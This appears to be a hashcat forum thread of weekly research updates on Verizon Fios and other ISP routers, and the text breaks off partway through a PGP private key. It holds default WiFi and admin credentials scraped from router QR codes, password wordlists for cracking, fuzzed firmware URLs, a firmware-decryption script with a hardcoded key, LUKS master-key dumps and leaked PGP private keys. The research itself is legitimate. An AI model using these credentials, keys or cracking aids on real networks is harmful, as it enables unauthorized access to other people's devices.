+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: Verizon Fios G3100 and E3200 Research (/thread-12540.html)
RE: Verizon Fios G3100 and E3200 Research - FiosFiend - 06-14-2025
Hey everyone, it’s time again for another update. I was able to manually process most of the images from last week's large scrape. I added some more of the G1100 MAC addresses. Unfortunately, we didn’t add to many entries to the database this week.
Updated Data Set:
router_data_FULL_061425.xlsx (Size: 823.16 KB / Downloads: 2)
The Dataset now contains:
G3100/E3200 - 613 entries
CR1000 A/B - 138 entries
ARC-XCI55AX - 122 entries
ASK-NCQ1338 - 142 entries
WNC-CR200A - 46 entries
G1100 - 322 entries
NVG558HX - 58 entries
Other - 118 entries
Total - 1559 entries
This week’s scrape did match 2 VERY similar passwords however. Certainly this can’t be a coincidence?
We caught a WNC-CR200A with the WiFi password grille9-yea-ode
We also have a CR1000A with the WiFi password yea-grille9-ork
I also figured out that the script to decrypt the CR1000A config file also works for the G3100! Modifying the config file was has been used to enable SSH on G1100 and CR1000. Unfortunately, on the latest firmware the G3100 doesn’t give us much to work with, just a bunch of files with the normal configuration parameters.
My device is currently on the latest firmware 3.4.0.10, so I tried to rollback my firmware using https://192.168.1.1/#/firmware_upgrade. I was able to roll back to 3.4.0.4, but anything before that was unsuccessful.
During this, I realized that the firmware was one version newer than my OP, so here are the links to the newest Firmware for G3100 and E3200
Code:
https://cpe-ems34.verizon.com/firmware/BHRx/g3100_fw_3.4.0.10_loader.bin
https://cpe-ems34.verizon.com/firmware/BHRx_Ext/e3200_fw_3.4.0.9_loader.binAlso I’m excited to share that with a bit of help from @soxrok2212 I was able to find some more previously unknown firmware links!
Here are the links for the G1100
Code:
http://cpe-ems0001.verizon.com/firmware/frontier4_vz_stepstone_release_01.03.01.02_firmwareupgrade.bin.signed
https://cpe-ems34.verizon.com/firmware/bhr4_release_02.03.00.13_firmwareupgrade.bin.signed
https://cpe-ems34.verizon.com/firmware/bhr4_release_02.03.00.14_firmwareupgrade.bin.signedThe first and last link I found in the firmware. Kind of strange, I expected to find more firmware versions, but I fuzzed the links using the file prefixs: bhr4, bhr4_release, and bhr4_stepstone_release, for firmware versions 01.00.00.00 to 03.05.06.30 followed by _firmwareupgrade or -FTR_firmwareupgrade ending with both .bin or .bin.signed on the base URLs https://cpe-ems33.verizon.com/firmware/, https://cpe-ems34.verizon.com/firmware/, and https://cpe-ems34.verizon.com/firmware/BHR4/. I also checked for frontier4_vz_stepstone_release, bhr4_stepstone_release, and bhr4_release on https://cpe-ems0001.verizon.com/firmware/.
The firmware contained these 2 links, but nothing is available there anymore.
Code:
https://cpe-ems34.verizon.com/firmware/bhr4_release_02.02.00.16_firmwareupgrade.bin.signed
https://cpe-ems34.verizon.com/firmware/bhr4_release_02.03.00.04_firmwareupgrade.bin.signedWe also found firmware links for the ASK-NCQ1338, I was able to figure out that the firmware naming is in the format ASK-NCQ1338_<current version>_<new version>.bin. Since I already collected the firmware version in the database, It was easy to enumerate other links! There were a few links missing files, I’m guessing that there is probably another firmware version in between. I could try fuzzing to find them, but I don’t think it’s entirely necessary at the moment. These links are accessible even if you’re not on the Fios network.
Code:
https://cdn2.vzwdm.com/ASK-NCQ1338_212331_212431.bin
https://cdn2.vzwdm.com/ASK-NCQ1338_212431_213231.bin
https://cdn2.vzwdm.com/ASK-NCQ1338_213231_214322.bin
<missing>https://cdn2.vzwdm.com/ASK-NCQ1338_214322_214727.bin
<missing>https://cdn2.vzwdm.com/ASK-NCQ1338_214727_220745.bin
<missing>https://cdn2.vzwdm.com/ASK-NCQ1338_220745_220847.bin
<missing>https://cdn2.vzwdm.com/ASK-NCQ1338_220847_222146.bin
https://cdn2.vzwdm.com/ASK-NCQ1338_220847_222146.bin
<missing>https://cdn2.vzwdm.com/ASK-NCQ1338_222656_222746.binRunning binwalk on the firmware, it pops right open! I haven’t found anything too exciting, but I still need to poke around more.
RE: Verizon Fios G3100 and E3200 Research - FiosFiend - 06-24-2025
This week was just a typical scrape, but we managed to add over 100 new entries! I also got the MAC addresses entered for the NVG558HX entries. We have added model CE1000A to the scrape, they get added under CR1000A/B.
Updated Data Set:
router_data_FULL_062425.xlsx (Size: 872.74 KB / Downloads: 3)
The Dataset now contains:
G3100/E3200 - 646 entries
CR1000 A/B - 158 entries
ARC-XCI55AX - 130 entries
ASK-NCQ1338 - 151 entries
WNC-CR200A - 49 entries
G1100 - 352 entries
NVG558HX - 60 entries
Other - 130 entries
Total - 1676 entries
I wanted to highlight some of the devices that get caught in the QR scrape but are out of scope for this thread. Maybe sometime I will have some time to check them out further. I have seen a dozen or so devices, but most of the time the QR only contains the SSID / Password. Here are a few that are a bit more interesting.
![[Image: s-l1600.jpg]](https://i.ebayimg.com/images/g/U38AAeSwXQBoUfka/s-l1600.jpg)
The QR code has the SSID, WiFi Password, Model, Serial, and Admin password.
Code:
('WIFI:T:WPA;S:CenturyLink0320;P:g3i2n6a7f8w5c4;http://www.centurylink.com/home/account/installmyapp.html;C4000BG;C4000BG2145000320;192.168.0.1;admin;W3h7v4m6',)The QR code is structured a bit differently, but contains all of the info that’s on the sticker.
Code:
('S/N:50D10M2BD07603\rMAC:80691A6ECE42\rName:_VelopSetupE42\rPassword:ktxt0dhzrj\rRecovery Key:67502',)The QR code has the SSID, WiFi password, MAC, Serial, Model
Code:
('WIFI:T:WPA2;S:MOTOB34E;P:glassfly525;;DEVICE:M:00403696B34E;S:1163-MG8702-30-1189;T:MG8702;;',)The QR code is missing the Serial and IMEI
Code:
('{"ID":"TMOBILE-7DF4",\n"KY":"award.wackiness.scabbed.jam",\n"U":"admin",\n"P":"wasp.raking.renewal.unleaded",\n"BT":"TMOBILE-7D-F4",\n"PN":"FMNT055AX000J",\n"23S":"ACDF9F1B7DF8"}',)Not much info in the QR code, but the sticker contains everything we would expect. These passwords are 8 characters all digits and very easy to crack as seen here and on WPA-SEC.
Code:
('WIFI:T:WPA;S:TP-Link_BB4E;P:43582969;;',)RE: Verizon Fios G3100 and E3200 Research - samer59 - 06-24-2025
In case anybody wants them: wordlists (including Admin password lists 8 letter and 9 letter in the next post) for TMobile KVD21. I've been collecting them for awhile. The words compiled strictly collected from KVD21.
RE: Verizon Fios G3100 and E3200 Research - samer59 - 06-24-2025
Here are the wordlists for 8 - letter, and 9 - letter.
RE: Verizon Fios G3100 and E3200 Research - FiosFiend - 06-30-2025
The weeks go by quick and it’s time for another update already! This week I didn’t run any scrapes or process any images for passwords, which means we don’t have a database update.
@samer59 shared his wordlists collected from the TMobile KVD21, so I thought I should extract all of the words in my database to their appropriate lists again. I have also included these Fios words in my lists. These lists are attached below.
Saved 454 unique words to 3_letter_words.txt
Saved 888 unique words to 4_letter_words.txt
Saved 611 unique words to 5_letter_words.txt
Saved 379 unique words to 6_letter_words.txt
Saved 564 unique words to 7_letter_words.txt
Saved 7 unique words to 8_letter_words.txt
Without including samer59’s contrubution, using the dictionary generator I previously posted would create a dictionary of 14,779,552,320 possible combinations for the strict 15-char <word><word><word> SSID passwords. Unfortunately I still haven’t found a way to reduce this list further.
It’s not all bad news this week though, I’ve made a bit of progress with the firmware! I shared the list of firmware links that I've found, and a GitHub user is hosting them for people that can’t download directly from Verizon
(https://3to.moe/verizon_fw/). My G3100 device is currently on version 3.4.0.10, which I thought was the latest version. However, I had noticed version 3.6.0.6 was listed on the Verizon firmware page. We already know the URL to find this firmware, so it was easy to find the link. Other devices had newer firmware listed too, so we grabbed those. I updated the fuzzing script with the new info and here’s what we found.Code:
G3100:
https://cpe-ems34.verizon.com/firmware/BHRx/g3100_fw_3.6.0.5_loader.bin
https://cpe-ems34.verizon.com/firmware/BHRx/g3100_fw_3.6.0.6_loader.bin
E3200:
https://cpe-ems34.verizon.com/firmware/BHRx_Ext/e3200_fw_3.6.0.3_loader.bin
CR1000A:
https://cpe-ems34.verizon.com/firmware/CHRA/chr2fa_fw_3.6.0.2_BD_loader.bin
CR1000B:
https://cpe-ems34.verizon.com/firmware/CHRB/chr2fb_fw_3.6.0.2_BD_loader.binI was also rereading the huge OpenWRT thread on unlocking the CR1000A again, which this post had a link to firmware that I previously overlooked. These file names would be much harder for me to fuzz since they include a timestamp. However searching for the "cdn3.vzwdm” I came across these links. These files are also able to be directly downloaded by anyone!
Code:
https://cdn3.vzwdm.com/hdm/chr2fa_fw_3.2.0.11_oldsig_1685136655890.bin
https://cdn3.vzwdm.com/hdm/chr2fa_fw_3.3.0.11_loader_1715281399811.bin
https://cdn3.vzwdm.com/hdm/chr2fa_fw_3.3.1.2_1735849764361.binThe firmware with the oldsig caught my attention. That is the first time we’ve seen this in the file name, and version 3.2.0.11 is actually one that we didn’t previously have. Unfortunately we don’t get any different outcomes using binwalk on these newly found firmware. However, the G3100/E3200 are Broadcom devices, and I found this script (BRCM-Unpack) that is supposed to unpack their firmware. Sadly it doesn’t correctly extract any of the G1100/G3100/E3200 firmware, but we get the following output for ALL of the CR1000A/B.
Code:
Image Processing Started on Thu 26 Jun 08:04:50 EDT 2025
Log: output.log
Source: chr2fa_fw_3.2.0.11_oldsig.bin
Size: 61219600
Checking Package Version
SQFS Offset: 55468552
Saved: root_fs.sqfs
Checking for FDT Pattern
FDT Offset: 256
Saved: chr2fa_fw_3.2.0.11_oldsig.dtb
chr2fa_fw_3.2.0.11_oldsig.dts: Warning (unit_address_vs_reg): /images/script/hash@1: node has a unit name, but no reg property
chr2fa_fw_3.2.0.11_oldsig.dts: Warning (unit_address_vs_reg): /images/hlos-199b4e2d5c82b8034f572c5225279453506f03d4/hash@1: node has a unit name, but no reg property
chr2fa_fw_3.2.0.11_oldsig.dts: Warning (unit_address_vs_reg): /images/rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450/hash@1: node has a unit name, but no reg property
chr2fa_fw_3.2.0.11_oldsig.dts: Warning (unit_address_vs_reg): /images/wififw_v1-45b62ade000c18bfeeb23ae30e5a6811eac05e2f/hash@1: node has a unit name, but no reg property
chr2fa_fw_3.2.0.11_oldsig.dts: Warning (unit_address_vs_reg): /images/wififw_v2-d1ec7b26faa44d75a2a40afa9a11c844f2b6ead3/hash@1: node has a unit name, but no reg property
Saved: chr2fa_fw_3.2.0.11_oldsig.dts
Description: Flashing emmc 200 200
Nodes: images
Images: script hlos-199b4e2d5c82b8034f572c5225279453506f03d4 rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450 wififw_v1-45b62ade000c18bfeeb23ae30e5a6811eac05e2f wififw_v2-d1ec7b26faa44d75a2a40afa9a11c844f2b6ead3
Extracting: script
Description: flash.scr
Created: Wed May 24 13:38:48 2023
Type: Script
Compression: uncompressed
Saved: script
Extracting: hlos-199b4e2d5c82b8034f572c5225279453506f03d4
Description: openwrt-ipq-ipq807x_64-qcom-ipq807x-hkxx-fit-uImage.itb.padded
Created: Wed May 24 13:38:48 2023
Type: Firmware
Compression: uncompressed
Saved: hlos-199b4e2d5c82b8034f572c5225279453506f03d4
Extracting: rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450
Description: openwrt-ipq-ipq807x_64-squashfs-root.img
Created: Wed May 24 13:38:48 2023
Type: Firmware
Compression: uncompressed
Saved: rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450
Extracting: wififw_v1-45b62ade000c18bfeeb23ae30e5a6811eac05e2f
Description: wifi_fw_squashfs.img
Created: Wed May 24 13:38:48 2023
Type: Firmware
Compression: uncompressed
Saved: wififw_v1-45b62ade000c18bfeeb23ae30e5a6811eac05e2f
Extracting: wififw_v2-d1ec7b26faa44d75a2a40afa9a11c844f2b6ead3
Description: wifi_fw_ipq8074_qcn9000_squashfs_v2.img
Created: Wed May 24 13:38:48 2023
Type: Firmware
Compression: uncompressed
Saved: wififw_v2-d1ec7b26faa44d75a2a40afa9a11c844f2b6ead3
Finished Image Processing: Thu 26 Jun 08:05:15 EDT 2025
Started Kernel Processing: Thu 26 Jun 08:05:15 EDT 2025
All Processing Completed on Thu 26 Jun 08:05:15 EDT 2025The script extracted several images for us! That rootfs looks nice, but its LUKS encrypted.
Code:
rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450: LUKS encrypted file, ver 1 [aes, xts-plain64, sha1] UUID: 4d12098e-44d5-46f4-8dd4-2622485ae277The file that starts with “hols-“ is actually the U-Boot image (fit-uImage.itb.padded), and is also encrypted. Fortunately the user spol-eff posted a script to decrypt this image. The original script was in Swift code, but I ported it to python.
Code:
import hashlib
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
import os
import struct
def decrypt_hlos(input_filepath, output_filepath):
"""
Decrypts the HLOS image using SHA384 for key derivation and AES-256 CBC.
Args:
input_filepath (str): Path to the input encrypted HLOS file.
output_filepath (str): Path for the decrypted output file.
"""
# 1. Key Derivation (SHA384)
# The Swift code uses SHA2(variant: .sha384).calculate(for: ...)
# The input bytes are [0x26, 0x46, 0x35, 0x75, 0x61, 0x23, 0x4f, 0x72, 0x36, 0x56]
key_material = bytes([0x26, 0x46, 0x35, 0x75, 0x61, 0x23, 0x4f, 0x72, 0x36, 0x56])
sha384_hash = hashlib.sha384(key_material).digest()
# The AES key is the first 0x20 (32) bytes of the SHA384 hash.
# SHA384 produces a 48-byte hash, so we take the prefix.
aes_key = sha384_hash[:0x20] # 32 bytes for AES-256
# 2. AES Setup (CBC Mode, No Padding)
# IV is Array(repeating: 0x0, count: 0x10) -> 16 null bytes
aes_iv = bytes([0x0] * 0x10) # 16 bytes for AES block size
# Initialize AES cipher
cipher = Cipher(algorithms.AES(aes_key), modes.CBC(aes_iv), backend=default_backend())
decryptor = cipher.decryptor()
# 3. File Handling and Decryption
try:
# Ensure output directory exists if output_filepath includes one
os.makedirs(os.path.dirname(output_filepath), exist_ok=True)
with open(input_filepath, 'rb') as input_file:
# Read the first 4 bytes (UInt32) for image size (little-endian)
# and then seek back and past the 0x200 offset.
# Swift code reads 4 bytes, then seeks to 0, then seeks to 0x200.
# We can directly seek to 0x200 and read the rest.
# First, read the full content after the header to calculate size if needed
# For this script, we'll mimic the Swift behavior for imageSize display
input_file.seek(0)
size_bytes = input_file.read(4)
if len(size_bytes) < 4:
raise ValueError("Input file too small to read image size header.")
# The Swift code loads as UInt32 littleEndian.
# struct.unpack('<I', ...) parses 4 bytes as unsigned int, little-endian.
image_size = struct.unpack('<I', size_bytes)[0]
print(f"Image size (from header): {image_size} bytes")
# Seek to the actual start of the encrypted data
input_file.seek(0x200)
image_bytes = input_file.read() # Read the rest of the file
# Decrypt the image bytes
decrypted_bytes = decryptor.update(image_bytes) + decryptor.finalize()
# Write decrypted data to output file
with open(output_filepath, 'wb') as output_file:
output_file.write(decrypted_bytes)
print(f"Done: written {len(decrypted_bytes)} bytes to {output_filepath}")
except FileNotFoundError:
print(f"Error: One of the files was not found.")
print(f"Input: {input_filepath}")
print(f"Output: {output_filepath}")
except Exception as e:
print(f"An error occurred: {e}")Once the hlos- file is decrypted, the image unpacks cleanly with unblob! The U-Boot image contains /etc/keyfile
On a Linux system with cryptsetup installed, we can use this keyfile to decrypt and open the LUKS encrypted rootfs.
Code:
#sudo cryptsetup --key-file=keyfile luksOpen <file_path> <mapping_name> -v
sudo cryptsetup --key-file=keyfile luksOpen rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450 CR1000A_rootfs -vThis command has -v for verbose output, and should display:
Key slot 0 unlocked.
Command successful.
The decrypted SquashFS image will be located at /dev/mapper/<mapping_name>, so we can extract the image with
Code:
#sudo unsquashfs /dev/mapper/<mapping_name>
sudo unsquashfs /dev/mapper/CR1000A_rootfsWhich gives us the full, decrypted rootfs
The keyfiles themselves aren’t in plain text, but we can view/share them using the command
Code:
cryptsetup luksDump —dump-master-key —key-file <keyfile path> <rootfs path>
WARNING!
========
The header dump with volume key is sensitive information
that allows access to encrypted partition without a passphrase.
This dump should be stored encrypted in a safe place.
Are you sure? (Type 'yes' in capital letters): YES
LUKS header information for rootfs-38f7ad8fe7922c1367cfac77ce43c6ee879dc450
Cipher name: aes
Cipher mode: xts-plain64
Payload offset: 4096
UUID: 4d12098e-44d5-46f4-8dd4-2622485ae277
MK bits: 256
MK dump: 30 c8 8e 47 a9 a0 d2 90 bb 3c 22 27 3f c7 53 a6
71 e7 29 80 53 1f 43 67 e1 dd ca d4 5c c9 3a f4I tried all of the above steps on the latest CR1000A firmware (chr2fa_fw_3.6.0.2_BD_loader.bin), everything works as expected!
Code:
LUKS header information for rootfs-d616347925ecd1d9eb4366fd0013d30798e505f5
Cipher name: aes
Cipher mode: xts-plain64
Payload offset: 4096
UUID: 36281f72-7198-49fb-aa70-70b1557b8b1b
MK bits: 256
MK dump: 82 29 97 83 3e 52 25 92 6b c5 c8 10 4c 32 a8 ea
be 99 f1 68 ae 08 6a c8 c7 86 fe 3d 31 aa 27 39I haven’t had much of a chance to poke around, but please let me know if anything catches your eye.
RE: Verizon Fios G3100 and E3200 Research - FiosFiend - 06-30-2025
The rest of the wordlists from the previous post.
RE: Verizon Fios G3100 and E3200 Research - FiosFiend - 07-06-2025
This week we’ve returned to our regularly scheduled scrapes, but only managed to snag 89 new entries.
Updated Data Set:
router_data_FULL_070525.xlsx (Size: 911.88 KB / Downloads: 5)
The Dataset now contains:
G3100/E3200 - 680 entries
CR1000 A/B - 166 entries
ARC-XCI55AX - 137 entries
ASK-NCQ1338 - 158 entries
WNC-CR200A - 58 entries
G1100 - 364 entries
NVG558HX - 65 entries
Other - 137 entries
Total - 1765 entries
We have a new device this week, the CME1000. I had been aware of this device for a while, but the sticker doesn’t have much information and I hadn’t found an image with a readable QR code yet. However, when we can read the QR code it has all of the relevant information. There is no device tear down, though I would like to see inside just for fun
Code:
('WIFI:S:Verizon_MP6P3L;T:WPA;P:oak3-spigot-pay;;EXTENDER:M:CME1000;S:AAB21103062;B:08B05532DB18;P:NKFYQD94G;;2',)I am a bit embarrassed to admit it, but I also realized this week we could have extracted the G1100 firmware since my original post . This GitHub page was part of my initial research, and until recently it contained the only known G1100 firmware (bhr4_release_01.03.02.02-FTR_firmwareupgrade.bin.signed and bhr4_stepstone_release_1.2.0.36.98.0_firmwareupgrade.bin.signed). Both of these firmware are encrypted with a PGP key, but fortunately jameshilliard has already extracted the Private Keys for us! Here are the keys, I have also attached them below.
G1100_key1
Code:
-----BEGIN PGP PRIVATE KEY BLOCK-----
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
=UtFV
-----END PGP PRIVATE KEY BLOCK-----G1100_key2
Code:
-----BEGIN PGP PRIVATE KEY BLOCK-----
lQOYBFLP6aQBCACpXewcfz5tFjCA+HaeTafYE8mhvtSab3D1eYqCJTcDdqC8wJEw
9bbUR1cGqZYev9oRjTG/gGUGbbToqqmAAneEi5+1i0ABHT8ThvF34G2nAa528dww
9kfOt842d82ojxhF7kx/KjeLDSaoPaYXbgpKyK8S4CcJM3CObvbxYafZAiGfHLQC
XcBPIe+8vb6T+6KnDl6kK5Tuej9bzEzRGN/UdvUh31JEdtFZJYpNY5URYljNpwwS
YxwGn9cOLu+IBon2OOciAwuxkM2/P1bn6K50QRzMMbtVZerBLQVCbKTYe55f2l1F
BLJ3iXLOI7OWv1Iw9TV2vH3oWCdpDLhJu153ABEBAAEAB/sFttyxr3IIldroFw9Q
KFg/4uxcJTH2I0lr4YBqA13CTlJ+W9Q/kyK/3HJUEA0NF4sA1EM37gSP6CFWR5/K
vl/lnHJfL9tmeOP5FttMdfQtJ3zemCrGNMutGVLUpUvOjUQT4/DidNGv7YR+4P7w
GRncIROVxEinjPvrX6oRmyphw3HADrOyKO5e1bzbmbAO2ZATc0ISOeMyuDZFG8ra
3g5mYtgcHQLtsRhRzyNEcnqGf4uiHMrLkaAOyPwmfubcIdMhYIuaqSJFoWjcNvQn
D9Hr4wyB4XRdMWSF/EyTHQDE0LgsK4+gm/MSbhDnLVJ5AUEVIckbfVbd6OzkQfGk
u3JFBADIF3/BEPh0/W+WuKS+Gnr5ED3O5Ix6YnbD5sBljAl8YotB8nmFzR4mw4j5
RLsadRTFppzUKao2lhUnx9qxY0BjU3qzTAtEfWNdAMm7/jRcmdeuayKFrdHHIJqN
AiwImDrV+qQ8C9E4N8h2meqK7cGrd5mpTk7AreYCEIlMfgpPFQQA2LCuNXjlkgv3
u60HYrTJAwFZCiUVqsWpQWCziC4M3ko9OdtZe6Z713VuSS9bUUMNA7UCWzew0Nx1
lRKv24mEL6STNpI//da5ql3imrLoK4bTNGwQAs/WyCPEUtiftvVY7Goa2XEhm5ZR
qqZ31Y2QcfGBQ0OuSBeQQFbGxossulsD/1k4+5mlmS/uReUWsHoaCwgwis3cnDHn
Gbevdw0AqzfxRxKRcjzqTftMYsrpdVqEvuF5ewj/YtZFbFsCZ3oXKkqFpq6qY64D
uL4mPh0giKykDxePbegOBhLXNdZfBpWZJbPG9cvu5p2qjejR7dm+u+1y/jOHnD14
OJZcQ8zLBA7gPYm0JlZlcml6b24gQkhSNCA8ZXVAZ3JlZW53YXZlcmVhbGl0eS5j
b20+iQE4BBMBAgAiBQJSz+mkAhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAK
CRCrx0hRZmJ25ZcECACbcMoHeREuldb7d7U84Bgoc6cyT4fi8tT4BZmeOUd9dc/i
dVWsqYpcWQ84eDIB4NkbpBc9cXb/duf4QKeB/b4mK9JlYiLpbVj+hsRn3k9b32w2
BDi9ikYYFAkJhlPodw/kMI0HgNv6lJ1d9HYHbPK4CbIkRBkuNTAKc8ZNSAV861qt
2jdfSRfKFWNBKBdjOsRaNd78VPAsUA9F5ORV6qr+TAgQKOu3W4puano8znkCdDtk
xU6fwzDFbUKSwCgwBS0eGvK4+sANMDsTCqfVyZDcy/fNZGEIiskBt5eb0WOLT9Aw
GaKqpRavSujAyXIc5V/njUvRSFHRymnfM/NfwowtnQOYBFLP6aQBCADP+ae1Q7qg
kPUCrA1ydZwHvoeyw4pdQlteQDd2+H2Wklyp8VNMS0FRa67hg2Mihv40DMl3JKTF
c+ZhG9B9P8hPz+STJPtidg8ckmIP9gxxJcA6dJ/5sIaaOQhrBIY56Ky0ZYOkXj/2
f8yMxFR0xwlMWDJacFyO0bqHLYaYseNC7YysQJPCDYD1lJ76X8EZdgYgw6sP+K9z
S0cs4t7GfI9Oj4ruqSVTw950JUSGlLiJMCU6K7mI78GCgzYgE3xL2XUrL22QutNo
WAzj7OCYhiWRah6COeIvN+3ucJCfCjH4ts/8lnstML8ru7/67RhyaN79jZlp/wA+
FHB/hNI59qfhABEBAAEAB/sGnLe+6Ph45KbvhvAWAqR7cAyxK6udX6/XOSgyR3/5
rq1Ux1wIPc/FsoxgtdxL45oXJk1s9OyqrO7HCVr5cnLQS8om/frilGGSXVqSCpb2
bXZ1PVI9PmYnJtdMTLxmQK4l/aC/8/GpaQKEOrU7Mb1LULYIH1CoB0W8iL9h4Sz6
KpPdWWOYRHmnjvgtXQiKu4jTPBysSVTy56Yj/+om+88XInP1TDW1em3yYBGczzKh
m8qiNnEkISD6HitbgjVbvabqiB9vGmEzOugJRgVSvY514zKFm8s/nIo7Y8SnR0Ud
rpNdLebx+4NTULnUhp2legPDXLKVQsbgNE2z0ev7GDWhBADlT8AUE4U3xsI8wa4n
dTPl9M8Eua9xnuKNb/fYKhN34J/FXXR9rDfzCXCH4C9zT58UxTKTe9MEEimlvuHY
